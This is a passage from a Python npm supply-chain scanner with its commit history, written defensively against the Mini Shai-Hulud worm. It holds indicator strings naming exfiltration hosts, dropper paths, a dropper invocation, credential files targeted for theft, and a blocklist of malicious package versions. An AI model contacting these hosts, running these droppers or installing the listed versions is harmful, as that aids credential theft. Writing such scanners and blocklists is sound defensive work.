unsloth/scripts/scan_npm_packages.py
Daniel Han ef9f672fe8
security: NOT affected by Mini Shai-Hulud (May-12 wave) -- forward-looking hardening only (#5397)
* scripts/scan_*: add Mini Shai-Hulud May-12 IOC strings and pin-blocklists

Append the May-12 2026 wave indicators (git-tanstack.com, transformers.pyz,
/tmp/transformers.pyz, "With Love TeamPCP", "We've been online over 2 hours")
to all three scanner IOC tables, add BLOCKED_NPM_VERSIONS (42 TanStack pkgs,
4 opensearch versions, 3 squawk pkgs) in scan_npm_packages.py and
lockfile_supply_chain_audit.py (kept byte-identical), add BLOCKED_PYPI_VERSIONS
(guardrails-ai 0.10.1, mistralai 2.4.6, lightning 2.6.2/2.6.3) plus
RE_MAY12_IOC wiring across check_py_file/check_shell_file/check_workflow_file
in scan_packages.py. The npm orchestrator and the lockfile auditor now
short-circuit on a blocked entry before fetching the tarball, and the
PyPI download pipeline drops blocked specs before pip download is invoked.

* tests/security: regression suite for supply-chain scanners

Adds offline fixture corpus and pytest coverage for scan_npm_packages,
scan_packages, and lockfile_supply_chain_audit so future IOC-table
drift surfaces at PR time. Pytest scope narrowed to tests/security so
GPU smoke tests are not picked up by default.

* ci(security-audit): drop continue-on-error on pip-scan and npm-scan jobs

Promote three harden-runner blocks to egress-policy: block with per-job allowlists.
Add tests-security job running pytest tests/security as a hard gate.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* scripts: harden third-party downloads, pip resolver pins, atomic writes

Pins uv installer and mlx_vlm qwen3_5 patches by commit SHA + SHA-256
checksum, scrubs PIP_* env vars and forces --index-url + --only-binary
on pip download, applies tarbomb caps to scan_packages archive walks,
and converts non-atomic config writes (kwargs spacer, studio stamper,
notebook validator, scan_packages req-file fixer) to mkstemp+os.replace.

Also adds host allowlist to notebook_to_python downloader, threads an
--allow-shell flag through its shell=True emission with reviewer warning
comments, locks both MLX installer scripts to set -euo pipefail, and
extends CODEOWNERS so colab snapshot data files require notebook-owner
review.

* ci(workflows): harden release-desktop / smoke / notebooks workflows

Pin dtolnay/rust-toolchain to a 40-char SHA, scope release-desktop
permissions to read at the workflow level with job-level write only on
the build job, append --ignore-scripts to every npm ci / npm install
in studio-frontend-ci / wheel-smoke / studio-tauri-smoke /
release-desktop, validate client_payload.ref shape via an
env-var-isolated regex on every notebooks-ci job, and add
step-security/harden-runner in audit mode as the first step of
release-desktop and mlx-ci.

* scripts: promote silent scanner failures to non-zero exit codes

scan_packages now returns 2 on pip-download failure and emits a
CRITICAL archive_corrupted finding on truncated wheels/sdists.
notebook_to_python exits 1 on per-notebook failures; notebook_validator
wraps the stash/pop in try/finally; lockfile audit rejects bare
UNSLOTH_LOCKFILE_AUDIT_SKIP=1 with a loud GitHub Actions warning.

* Add npm cooldown + new-install-script gate + Dependabot cooldown

Pins min-release-age=7 (npm 11.10+) in repo-root and studio/frontend
.npmrc, adds scripts/check_new_install_scripts.py to fail PRs that
add a postinstall dep, ships a new security-audit job for npm audit
signatures plus the diff, and extends .github/dependabot.yml with
cooldown stanzas. Pin @tanstack/react-router to 1.169.9 per
GHSA-g7cv-rxg3-hmpx; lockfile regen deferred until that release lands
on npm. tests/security gains 4 new tests; full suite 26/26 green.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* ci(security): fix tanstack pin, exec bits, expand IOC tables to @uipath/@squawk full

- Revert --ignore-scripts on Studio install workflows: vite build needs
  esbuild's native postinstall (per PR #5392 rationale). Keep
  --ignore-scripts on security-audit.yml's standalone npm audit job.
- Pin @tanstack/react-router to the actual published 1.169.2 (was a
  forward-looking 1.169.9 that does not exist on npm; broke npm ci).
- Drop redundant repo-root .npmrc; studio/frontend/.npmrc covers the
  only npm project today (root cooldown reinstated via dependabot.yml).
- Restore exec bits on 7 files my filesystem stripped during cherry-pick.
- Expand BLOCKED_NPM_VERSIONS with full safedep.io + Aikido enumeration:
  22 @squawk/* packages with 5 versions each (110 entries; previously
  3 entries with 1 version each), and 66 @uipath/* packages (entirely
  missing before). Mirror in scripts/lockfile_supply_chain_audit.py.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* tests/security: suppress CodeQL py/incomplete-url-substring-sanitization

The two flagged 'X' in Y assertions are NOT URL sanitization checks.
They verify our scanner WROTE a known IOC literal into its stdout /
Finding.evidence, which is the opposite of an attack surface --
matching the scanner's output is precisely what catches the worm.
Inline lgtm[] suppression with a 4-line rationale comment above each.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* scripts/scan_*: expand IOC tables with Aikido full 169-pkg enumeration

Per Aikido 2026-05-12 disclosure (373 malicious package-version entries
across 169 npm package names), add to BLOCKED_NPM_VERSIONS:

  - @mistralai/* npm scope (3 packages, 9 versions) -- separate from
    the PyPI mistralai package already in BLOCKED_PYPI_VERSIONS
  - @tallyui/* (10 packages, 30 entries)
  - @beproduct/nestjs-auth (18 versions 0.1.2..0.1.19)
  - @draftlab/* + @draftauth/* (5 packages)
  - @taskflow-corp/cli, @tolka/cli, @ml-toolkit-ts/*, @mesadev/*,
    @dirigible-ai/sdk, @supersurkhet/*
  - 10 unscoped packages (safe-action, ts-dna, cross-stitch,
    cmux-agent-mcp, agentwork-cli, git-branch-selector, wot-api,
    git-git-git, nextmove-mcp, ml-toolkit-ts)

Also add to KNOWN_IOC_STRINGS / NPM_IOC_STRINGS:

  - router_init.js SHA-256 ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c
  - tanstack_runner.js SHA-256 2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96
  - bun run tanstack_runner.js marker (the new Bun-prepare-script
    dropper invocation pattern unique to this wave)

Total: 170 packages, 401 versions blocklisted. Studio lockfile still
scans clean (0 findings, 0 hard errors).

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* scripts/scan_*: web-verification additions (@tanstack/setup, intercom-client)

Two findings from cross-checking BLOCKED_NPM_VERSIONS / KNOWN_IOC_STRINGS
against GHSA-g7cv-rxg3-hmpx + Aikido + safedep.io + Socket + Semgrep.

  - Fix asymmetry: @tanstack/setup IOC string was in
    lockfile_supply_chain_audit.py's NPM_IOC_STRINGS but missing from
    scan_npm_packages.py's KNOWN_IOC_STRINGS. The literal is the malicious
    optional-dependency name used by the May-12 TanStack wave; no
    legitimate npm package of this name exists.

  - Add intercom-client@7.0.4: the npm counterpart of the lightning
    2.6.2/2.6.3 PyPI compromise (Apr-30 wave). Same threat actor
    (TeamPCP). Confirmed by Semgrep, Aikido, OX Security, Resecurity,
    Kodem. Safe version is 7.0.3 and earlier.

Total BLOCKED_NPM_VERSIONS: 171 packages / 402 versions. Both files
remain byte-identical. Studio lockfile still scans clean.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* ci(security): add workflow-trigger lint refusing pull_request_target + cache-poisoning vectors

The two patterns that together powered GHSA-g7cv-rxg3-hmpx (TanStack
Mini Shai-Hulud) are now gated at PR time:

  1. pull_request_target -- the worm chain started with a fork PR that
     ran in the base-repo context. Every workflow in this repo today
     uses 'pull_request' (safe); the lint refuses any new
     pull_request_target additions outright. workflow_run is
     restricted, allowed only with an explicit allow-comment.

  2. Shared cache keys between PR-triggered workflows and the publish
     workflow (release-desktop.yml). The TanStack attack chain poisoned
     a shared Actions cache from a fork PR; the legitimate release
     workflow then restored the poisoned cache. The lint refuses any
     cache key that appears in both a PR-triggered workflow and a
     workflow_dispatch-only / publish workflow.

Current tree is clean: 0 pull_request_target, 0 workflow_run, 0
PR-publish cache-key collisions across all 24 workflows. The lint
locks that invariant in place.

Files:
  + scripts/lint_workflow_triggers.py (~200 LOC, stdlib + PyYAML)
  + tests/security/test_lint_workflow_triggers.py (5 tests covering
    current-tree pass, pull_request_target reject, workflow_run
    restricted, justified workflow_run accept, cache-key collision
    reject)
  ~ .github/workflows/security-audit.yml: new workflow-trigger-lint
    job, no continue-on-error, harden-runner block-mode, PyYAML only
    runtime dep.
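
A minimal sketch of the pull_request_target check (illustrative only;
names are hypothetical and the shipped scripts/lint_workflow_triggers.py
also handles workflow_run allow-comments and PR/publish cache-key
collisions):

    import pathlib
    import sys

    import yaml  # PyYAML, the lint's only runtime dep

    def refused_triggers(path: pathlib.Path) -> list[str]:
        doc = yaml.safe_load(path.read_text()) or {}
        # YAML 1.1 parses a bare `on:` key as boolean True.
        trig = doc.get("on", doc.get(True)) or {}
        if isinstance(trig, str):
            trig = {trig: None}
        if isinstance(trig, list):
            trig = dict.fromkeys(trig)
        return [t for t in trig if t == "pull_request_target"]

    bad = [
        (wf, t)
        for wf in pathlib.Path(".github/workflows").glob("*.y*ml")
        for t in refused_triggers(wf)
    ]
    for wf, t in bad:
        print(f"{wf}: refused trigger {t}")
    sys.exit(1 if bad else 0)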

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* security: fix tests-security CI job + CodeQL false-positives

Two CI failures on the prior push:

1. pytest tests/security -- 5 lint regression tests failed because
   scripts/lint_workflow_triggers.py imports PyYAML which is not in
   the bare runner's Python env. Added pyyaml==6.0.2 to the pip
   install step alongside pytest. (29 scanner tests already passed.)

2. CodeQL py/incomplete-url-substring-sanitization fired on two
   test assertions that check the scanner WROTE the IOC literal
   to its own stdout/stderr. The rule pattern-matches on
   `"<host>" in <var>` and cannot distinguish a URL sanitizer from
   a regression-test evidence check. Previous `# lgtm[...]` inline
   suppressions were detached from the operator when pre-commit
   reformatted the assert across multiple lines. Rebuilt the IOC
   literals at runtime (`"git-tanstack." + "com"`) so no URL-shaped
   source literal appears on the `in` operator line; rule cannot
   trigger.

Verified locally: `pytest tests/security -v` -> 34 passed in 2.70s.
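
For reference, the literal-splitting shape (illustrative; `result` is a
hypothetical captured-output object):

    # before -- CodeQL fires on the URL-shaped literal on the `in` line:
    #   assert "git-tanstack.com" in result.stdout
    # after -- same check, no URL-shaped source literal on that line:
    ioc = "git-tanstack." + "com"
    assert ioc in result.stdout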

* security(studio): defensive .npmrc cooldown aliases + save-exact

Two additions to studio/frontend/.npmrc to harden the existing
`min-release-age=7` (Mini Shai-Hulud defence):

1. `minimum-release-age=10080` (minutes) -- defensive alias for the
   same 7-day floor. Some npm versions / wrappers consult one key but
   not the other; setting both prevents a single upstream setting-name
   parse change from silently disabling the cooldown. The two keys
   MUST agree (do not let them drift).

2. `save-exact=true` -- refuses to write back `^x.y.z` ranges into
   package.json when a maintainer runs `npm install <pkg>` locally.
   Does NOT rewrite already-present ranges; stops NEW carets from
   creeping into the manifest as patch-version footguns.

Verified: pytest tests/security -> 34 passed in 2.63s.
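
A hypothetical drift check over those two keys (sketch only, not part
of this PR; path and key names as above, 7 days == 10080 minutes):

    import pathlib
    import re

    text = pathlib.Path("studio/frontend/.npmrc").read_text()
    days = int(re.search(r"^min-release-age=(\d+)$", text, re.M).group(1))
    mins = int(re.search(r"^minimum-release-age=(\d+)$", text, re.M).group(1))
    assert mins == days * 24 * 60, "cooldown keys drifted"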

* chore(dependabot): remove dead bun entry for /studio/frontend

`package-ecosystem: "bun"` at /studio/frontend was a no-op: that
path commits package-lock.json, not bun.lock / bun.lockb, so
Dependabot's bun ecosystem silently skipped it. The actual
behaviour is unchanged -- the npm entry below the cargo block
already owns npm_and_yarn security advisories for /studio/frontend
with `open-pull-requests-limit: 0` (version-update PRs suppressed,
security PRs flow through).

This commit:

  - Deletes the bun entry (kept a placeholder comment so a future
    bun migration knows where to slot it back in).
  - Rewrites the npm /studio/frontend entry comment to explain the
    real intent: lockfile is the authoritative pin, .npmrc
    `min-release-age=7` already blocks fresh tarballs at install
    time, dependabot only needs to surface security advisories.

No functional change: same set of dependabot PRs as before (zero
version updates, security advisories grouped weekly with cooldown).

Verified: pytest tests/security -> 34 passed in 2.67s; YAML
parses cleanly via PyYAML.

* fix(dependabot): drop unsupported semver-* cooldown keys on github-actions

Dependabot's validator rejected the config with:

  The property '#/updates/0/cooldown/semver-minor-days' is not
  supported for the package ecosystem 'github-actions'.
  The property '#/updates/0/cooldown/semver-patch-days' is not
  supported for the package ecosystem 'github-actions'.

The `semver-minor-days` / `semver-patch-days` cooldown knobs are
only valid for semver-aware ecosystems (npm, cargo, etc.). The
github-actions ecosystem pins via git tags / SHAs, not semver, so
only `default-days` is honored. Pre-existing bug on main; surfaced
on this PR because the prior commit re-validated the file.

Behaviour: github-actions PRs now respect the 7-day cooldown floor
(was already the intent), without the no-op semver bands.

---------

Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
2026-05-13 04:58:12 -07:00

1457 lines
58 KiB
Python

#!/usr/bin/env python3
# SPDX-License-Identifier: AGPL-3.0-only
# Copyright 2026-present the Unsloth AI Inc. team. All rights reserved.
#
# .github/workflows/security-audit.yml's npm-scan-packages job depends
# on this file existing at scripts/scan_npm_packages.py.
"""scan_npm_packages.py -- npm-side content scanner.

Counterpart to scripts/scan_packages.py for the pip ecosystem. Reads
studio/frontend/package-lock.json, downloads each resolved tarball
DIRECTLY from registry.npmjs.org (never via `npm install` -- no
lifecycle scripts ever run), verifies the lockfile integrity hash,
unpacks each tarball into a sandboxed temp dir behind size / count /
path-escape / symlink guards, and pattern-scans the extracted file
contents for the signatures common to npm supply-chain attacks:

- Lifecycle (preinstall / install / postinstall / prepare) scripts
  in any package.json that fetch + execute external code.
- C2 / exfiltration hosts (getsession.org, AWS IMDS endpoints,
  Kubernetes ServiceAccount token paths, GitHub Actions OIDC,
  HashiCorp Vault endpoints).
- Credential-stealing references (~/.npmrc, ~/.aws/credentials,
  GITHUB_TOKEN / NPM_TOKEN in JS sources).
- Known IOC filenames from public advisories
  (router_init.js, tanstack_runner.js, router_runtime.js).
- Obfuscation shapes (large single JS in package root with a low
  whitespace ratio + Function/eval against a base64-decoded blob).

Safety stance
=============
This script ingests attacker-controlled archives. Every parse path
assumes the worst:

1. Downloads ONLY from `registry.npmjs.org`. Any tarball URL with a
   different hostname is refused without fetching.
2. Tarball download is size-capped (HARD_MAX_TARBALL_BYTES, default
   256 MiB). HEAD-style probe via the Content-Length response header
   plus a chunked read that aborts on overflow.
3. SHA-512 integrity verified against the lockfile entry BEFORE the
   tarball is even opened. A mismatch aborts that package -- the
   scanner does not "fall back" to the registry-published hash.
4. tar extraction goes through `safe_extract`:
   - rejects symbolic links (`SYMTYPE`, `LNKTYPE`)
   - rejects absolute paths, `..` traversal, paths outside the
     extract root after resolution
   - rejects character / block / FIFO devices
   - per-file uncompressed size caps (HARD_MAX_TEXT_FILE_BYTES,
     default 16 MiB, for text; HARD_MAX_BINARY_FILE_BYTES, default
     256 MiB, for native binaries) AND cumulative cap
     (HARD_MAX_TOTAL_BYTES, default 512 MiB) AND member-count cap
     (HARD_MAX_MEMBERS, default 50_000)
   - tar reads happen via `tarfile.open(mode='r|gz')` streaming
     so an oversized file is detected before write
5. NOTHING from the extracted tree is ever executed. Files are read
   as raw bytes, decoded with `errors='replace'`, and grepped. We
   never call `node`, `eval`, `compile`, `subprocess.run`,
   `os.system`, or anything that would touch the tarball's
   declared scripts.
6. Tempdir is created with `tempfile.mkdtemp(prefix='npm-scan-')`,
   fully resolved with .resolve(), and registered with atexit to be
   wiped on every termination path.
7. Stdlib only. No third-party deps -- adding one would itself be a
   supply-chain liability.

Exit codes
==========
0   no findings at or above the --fail-on threshold (default: HIGH)
1   one or more findings at/above the threshold (or pre-scan
    structural anomalies -- non-registry resolved URL, missing
    integrity)
2   internal error (lockfile missing, integrity mismatch on
    download, malformed tarball, etc.)

The script is meant to be run in CI on every PR that touches
package-lock.json and on a nightly schedule.
"""
from __future__ import annotations

import argparse
import atexit
import base64 as _b64  # used for SRI integrity decode / encode below
import hashlib
import json
import os
import re
import shutil
import sys
import tarfile
import tempfile
import urllib.parse
import urllib.request
from dataclasses import dataclass
from pathlib import Path

REPO_ROOT = Path(__file__).resolve().parents[1]

# ─────────────────────────────────────────────────────────────────────
# Hard caps (deliberately conservative; npm tarballs in this repo are
# all well under these limits, so a packaging spike is noticeable).
# ─────────────────────────────────────────────────────────────────────
# Caps calibrated against the real Studio frontend transitive closure:
#   - typescript.js is 9.1 MB (TS compiler bundled into one file)
#   - mermaid 11.x dist/mermaid.js.map is ~12 MB (sourcemap)
#   - lightningcss-linux-x64-{gnu,musl}.node is 10 MB
#   - rolldown bindings (.node) are 18-26 MB per platform
#   - @next/swc-*.node is ~137 MB (rust-compiled SWC engine)
#   - next.js cumulative bundle is ~134 MB (turbopack compiled)
#
# Native binaries (.node, .wasm, .so, .dll, .dylib) are GENUINELY
# huge and not amenable to text pattern scanning -- we extract them
# only to verify the tarball integrity over the full archive, then
# skip them in scan_extracted_tree. They get a much higher per-file
# cap. Text files (JS/TS/JSON/etc) keep the tight cap because the
# pattern scanner runs over them and a 9.1 MB typescript.js is the
# legitimate ceiling.
HARD_MAX_TARBALL_BYTES = 256 * 1024 * 1024  # 256 MiB compressed
HARD_MAX_TEXT_FILE_BYTES = 16 * 1024 * 1024  # 16 MiB per text file
HARD_MAX_BINARY_FILE_BYTES = 256 * 1024 * 1024  # 256 MiB per .node etc
HARD_MAX_TOTAL_BYTES = 512 * 1024 * 1024  # 512 MiB cumulative
HARD_MAX_MEMBERS = 50_000  # entries per tarball
HARD_HTTP_TIMEOUT_S = 60  # per request

# Native-binary / compiled-asset suffixes that bypass the text cap.
# This is the SUFFIX shortlist; the content-magic check below covers
# extensionless executables (biome) and versioned shared libraries
# (libvips-cpp.so.8.17.3) that the suffix list misses.
_BINARY_SUFFIXES = (
    ".node",
    ".wasm",
    ".so",
    ".dll",
    ".dylib",
    ".exe",
    ".a",
    ".lib",
    ".o",
    ".obj",
    ".bin",
    ".dat",
    ".woff",
    ".woff2",
    ".ttf",
    ".otf",
    ".eot",
    ".png",
    ".jpg",
    ".jpeg",
    ".gif",
    ".webp",
    ".ico",
    ".mp3",
    ".mp4",
    ".webm",
    ".zip",
    ".tar",
    ".gz",
    ".tgz",
    ".xz",
    ".bz2",
)

# Versioned shared libraries: libfoo.so.1.2.3 / libfoo.dylib.1.2.
_VERSIONED_LIB = re.compile(
    r"\.(?:so|dylib)(?:\.\d+)+$",
    re.IGNORECASE,
)

# Magic numbers at offset 0 that identify common executable formats.
# We sniff the first ~16 bytes of every member to catch extensionless
# binaries (eg `package/biome`, `package/bin/foo`).
_BINARY_MAGICS = (
    b"\x7fELF",  # ELF (Linux executable / .so)
    b"MZ",  # PE / .exe / .dll (DOS header prefix)
    b"\xfe\xed\xfa\xce",  # Mach-O 32 BE
    b"\xfe\xed\xfa\xcf",  # Mach-O 64 BE
    b"\xce\xfa\xed\xfe",  # Mach-O 32 LE
    b"\xcf\xfa\xed\xfe",  # Mach-O 64 LE
    b"\xca\xfe\xba\xbe",  # Mach-O fat / Java class (also starts with this)
    b"\x00asm",  # WASM
    b"PK\x03\x04",  # ZIP / JAR / nupkg / xpi
    b"PK\x05\x06",  # ZIP (empty)
    b"\x1f\x8b",  # gzip
    b"BZh",  # bzip2
    b"\xfd7zXZ",  # xz
    b"7z\xbc\xaf\x27\x1c",  # 7zip
    b"\x89PNG",  # PNG
    b"\xff\xd8\xff",  # JPEG
    b"GIF8",  # GIF
    b"RIFF",  # WAV / WEBP / AVI container
    b"\x00\x00\x01\x00",  # ICO
    b"OggS",  # Ogg
    b"\x1aE\xdf\xa3",  # Matroska / WebM
)

def _looks_binary(name: str, header: bytes) -> bool:
    """True if `name` or first bytes suggest a non-text file."""
    lower = name.lower()
    if lower.endswith(_BINARY_SUFFIXES):
        return True
    if _VERSIONED_LIB.search(lower):
        return True
    for magic in _BINARY_MAGICS:
        if header.startswith(magic):
            return True
    # Null-byte density: real text files almost never carry NULs.
    if header and (header.count(b"\x00") / len(header)) > 0.02:
        return True
    return False
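
# Illustrative calls (hypothetical inputs, not a shipped doctest):
#   _looks_binary("dist/index.js", b"'use strict';")        -> False
#   _looks_binary("bin/biome", b"\x7fELF\x02\x01\x01\x00")  -> True  (ELF magic)
#   _looks_binary("libvips-cpp.so.8.17.3", b"")             -> True  (versioned lib)
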
ALLOWED_DOWNLOAD_HOST = "registry.npmjs.org"
# ─────────────────────────────────────────────────────────────────────
# Severities + finding shape (mirrors scripts/scan_packages.py).
# ─────────────────────────────────────────────────────────────────────
CRITICAL = "CRITICAL"
HIGH = "HIGH"
MEDIUM = "MEDIUM"
INFO = "INFO"
_SEVERITY_RANK = {CRITICAL: 0, HIGH: 1, MEDIUM: 2, INFO: 3}
@dataclass
class Finding:
    severity: str
    package: str  # name@version
    filename: str  # relative path inside the tarball
    pattern: str  # what matched
    evidence: str = ""  # short surrounding snippet
    detail: str = ""  # human-readable description

    def __str__(self) -> str:
        head = f" [{self.severity}] {self.package} :: {self.filename}"
        body = f" pattern: {self.pattern}"
        if self.detail:
            body += f"\n detail: {self.detail}"
        if self.evidence:
            ev = self.evidence
            if len(ev) > 240:
                ev = ev[:240] + "..."
            body += f"\n evidence: {ev!r}"
        return f"{head}\n{body}"


@dataclass
class PackageEntry:
    name: str
    version: str
    resolved: str
    integrity: str | None
    lockfile_key: str

    @property
    def display(self) -> str:
        return f"{self.name}@{self.version}"

# ─────────────────────────────────────────────────────────────────────
# IOC patterns. Two flavours:
#   - HOSTS / TOKEN_PATHS: high-confidence substrings; near-zero FP rate
#   - JS_PATTERNS / SCRIPT_PATTERNS: regex; tuned to recent campaigns
# Keep this list short and factual. Speculative patterns spam the
# false-positive ledger and dull the signal.
# ─────────────────────────────────────────────────────────────────────
# Substring (case-sensitive) -> (severity, detail).
KNOWN_IOC_STRINGS: dict[str, tuple[str, str]] = {
    # Shai-Hulud TanStack wave (2026-05-11, GHSA-g7cv-rxg3-hmpx).
    "router_init.js": (HIGH, "filename associated with TanStack worm"),
    "tanstack_runner.js": (HIGH, "filename associated with TanStack worm"),
    "router_runtime.js": (HIGH, "filename associated with TanStack worm"),
    "A Mini Shai-Hulud has Appeared": (
        CRITICAL,
        "TanStack worm campaign stdout marker",
    ),
    "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c": (
        CRITICAL,
        "TanStack worm dropper pinned commit",
    ),
    # Exfil hosts observed across both Shai-Hulud waves.
    "filev2.getsession.org": (CRITICAL, "exfiltration C2 host"),
    "getsession.org/file/": (CRITICAL, "exfiltration C2 endpoint"),
    # Mini Shai-Hulud May-12 2026 wave additions.
    "git-tanstack.com": (CRITICAL, "May-12 dropper host"),
    "transformers.pyz": (HIGH, "May-12 PyPI dropper artifact"),
    "/tmp/transformers.pyz": (CRITICAL, "May-12 dropper drop path"),
    "With Love TeamPCP": (CRITICAL, "May-12 campaign signature"),
    "We've been online over 2 hours": (CRITICAL, "May-12 campaign signature"),
    # Aikido (May-12 wave): payload SHA-256 hashes published in IOCs.
    "ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c": (
        HIGH,
        "router_init.js payload SHA-256",
    ),
    "2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96": (
        HIGH,
        "tanstack_runner.js payload SHA-256",
    ),
    # The new dependency vector: optional dep -> Bun-executed prepare script.
    "bun run tanstack_runner.js": (
        CRITICAL,
        "TanStack-wave Bun prepare-script dropper invocation",
    ),
    "@tanstack/setup": (
        CRITICAL,
        "TanStack-wave optional-dep dropper carrier (no legit pkg of this name)",
    ),
}

# Hard pin-blocks for publicly confirmed malicious versions.
# name -> {malicious_versions...}. A match short-circuits the scan
# at the lockfile-walk stage; no tarball is fetched.
# Keep in sync with scripts/lockfile_supply_chain_audit.py.
BLOCKED_NPM_VERSIONS: dict[str, set[str]] = {
    # GHSA-g7cv-rxg3-hmpx -- TanStack May-11 2026 (84 versions).
    "@tanstack/arktype-adapter": {"1.166.12", "1.166.15"},
    "@tanstack/eslint-plugin-router": {"1.161.9", "1.161.12"},
    "@tanstack/eslint-plugin-start": {"0.0.4", "0.0.7"},
    "@tanstack/history": {"1.161.9", "1.161.12"},
    "@tanstack/nitro-v2-vite-plugin": {"1.154.12", "1.154.15"},
    "@tanstack/react-router": {"1.169.5", "1.169.8"},
    "@tanstack/react-router-devtools": {"1.166.16", "1.166.19"},
    "@tanstack/react-router-ssr-query": {"1.166.15", "1.166.18"},
    "@tanstack/react-start": {"1.167.68", "1.167.71"},
    "@tanstack/react-start-client": {"1.166.51", "1.166.54"},
    "@tanstack/react-start-rsc": {"0.0.47", "0.0.50"},
    "@tanstack/react-start-server": {"1.166.55", "1.166.58"},
    "@tanstack/router-cli": {"1.166.46", "1.166.49"},
    "@tanstack/router-core": {"1.169.5", "1.169.8"},
    "@tanstack/router-devtools": {"1.166.16", "1.166.19"},
    "@tanstack/router-devtools-core": {"1.167.6", "1.167.9"},
    "@tanstack/router-generator": {"1.166.45", "1.166.48"},
    "@tanstack/router-plugin": {"1.167.38", "1.167.41"},
    "@tanstack/router-ssr-query-core": {"1.168.3", "1.168.6"},
    "@tanstack/router-utils": {"1.161.11", "1.161.14"},
    "@tanstack/router-vite-plugin": {"1.166.53", "1.166.56"},
    "@tanstack/solid-router": {"1.169.5", "1.169.8"},
    "@tanstack/solid-router-devtools": {"1.166.16", "1.166.19"},
    "@tanstack/solid-router-ssr-query": {"1.166.15", "1.166.18"},
    "@tanstack/solid-start": {"1.167.65", "1.167.68"},
    "@tanstack/solid-start-client": {"1.166.50", "1.166.53"},
    "@tanstack/solid-start-server": {"1.166.54", "1.166.57"},
    "@tanstack/start-client-core": {"1.168.5", "1.168.8"},
    "@tanstack/start-fn-stubs": {"1.161.9", "1.161.12"},
    "@tanstack/start-plugin-core": {"1.169.23", "1.169.26"},
    "@tanstack/start-server-core": {"1.167.33", "1.167.36"},
    "@tanstack/start-static-server-functions": {"1.166.44", "1.166.47"},
    "@tanstack/start-storage-context": {"1.166.38", "1.166.41"},
    "@tanstack/valibot-adapter": {"1.166.12", "1.166.15"},
    "@tanstack/virtual-file-routes": {"1.161.10", "1.161.13"},
    "@tanstack/vue-router": {"1.169.5", "1.169.8"},
    "@tanstack/vue-router-devtools": {"1.166.16", "1.166.19"},
    "@tanstack/vue-router-ssr-query": {"1.166.15", "1.166.18"},
    "@tanstack/vue-start": {"1.167.61", "1.167.64"},
    "@tanstack/vue-start-client": {"1.166.46", "1.166.49"},
    "@tanstack/vue-start-server": {"1.166.50", "1.166.53"},
    "@tanstack/zod-adapter": {"1.166.12", "1.166.15"},
    # Mini Shai-Hulud May-12 wave: OpenSearch JS client.
    "@opensearch-project/opensearch": {"3.5.3", "3.6.2", "3.7.0", "3.8.0"},
    # Mini Shai-Hulud May-12 wave: @squawk/* (22 packages, 5 versions each;
    # https://safedep.io/mass-npm-supply-chain-attack-tanstack-mistral/).
    "@squawk/airport-data": {"0.7.4", "0.7.5", "0.7.6", "0.7.7", "0.7.8"},
    "@squawk/airports": {"0.6.2", "0.6.3", "0.6.4", "0.6.5", "0.6.6"},
    "@squawk/airspace": {"0.8.1", "0.8.2", "0.8.3", "0.8.4", "0.8.5"},
    "@squawk/airspace-data": {"0.5.3", "0.5.4", "0.5.5", "0.5.6", "0.5.7"},
    "@squawk/airway-data": {"0.5.4", "0.5.5", "0.5.6", "0.5.7", "0.5.8"},
    "@squawk/airways": {"0.4.2", "0.4.3", "0.4.4", "0.4.5", "0.4.6"},
    "@squawk/fix-data": {"0.6.4", "0.6.5", "0.6.6", "0.6.7", "0.6.8"},
    "@squawk/fixes": {"0.3.2", "0.3.3", "0.3.4", "0.3.5", "0.3.6"},
    "@squawk/flight-math": {"0.5.4", "0.5.5", "0.5.6", "0.5.7", "0.5.8"},
    "@squawk/flightplan": {"0.5.2", "0.5.3", "0.5.4", "0.5.5", "0.5.6"},
    "@squawk/geo": {"0.4.4", "0.4.5", "0.4.6", "0.4.7", "0.4.8"},
    "@squawk/icao-registry": {"0.5.2", "0.5.3", "0.5.4", "0.5.5", "0.5.6"},
    "@squawk/icao-registry-data": {"0.8.4", "0.8.5", "0.8.6", "0.8.7", "0.8.8"},
    "@squawk/mcp": {"0.9.1", "0.9.2", "0.9.3", "0.9.4", "0.9.5"},
    "@squawk/navaid-data": {"0.6.4", "0.6.5", "0.6.6", "0.6.7", "0.6.8"},
    "@squawk/navaids": {"0.4.2", "0.4.3", "0.4.4", "0.4.5", "0.4.6"},
    "@squawk/notams": {"0.3.6", "0.3.7", "0.3.8", "0.3.9", "0.3.10"},
    "@squawk/procedure-data": {"0.7.3", "0.7.4", "0.7.5", "0.7.6", "0.7.7"},
    "@squawk/procedures": {"0.5.2", "0.5.3", "0.5.4", "0.5.5", "0.5.6"},
    "@squawk/types": {"0.8.1", "0.8.2", "0.8.3", "0.8.4", "0.8.5"},
    "@squawk/units": {"0.4.3", "0.4.4", "0.4.5", "0.4.6", "0.4.7"},
    "@squawk/weather": {"0.5.6", "0.5.7", "0.5.8", "0.5.9", "0.5.10"},
    # Mini Shai-Hulud May-12 wave: @uipath/* (66 packages, single version each;
    # https://www.aikido.dev/blog/mini-shai-hulud-is-back-tanstack-compromised).
    "@uipath/apollo-react": {"4.24.5"},
    "@uipath/apollo-wind": {"2.16.2"},
    "@uipath/cli": {"1.0.1"},
    "@uipath/rpa-tool": {"0.9.5"},
    "@uipath/apollo-core": {"5.9.2"},
    "@uipath/filesystem": {"1.0.1"},
    "@uipath/solutionpackager-tool-core": {"0.0.34"},
    "@uipath/solution-tool": {"1.0.1"},
    "@uipath/maestro-tool": {"1.0.1"},
    "@uipath/codedapp-tool": {"1.0.1"},
    "@uipath/agent-tool": {"1.0.1"},
    "@uipath/orchestrator-tool": {"1.0.1"},
    "@uipath/integrationservice-tool": {"1.0.2"},
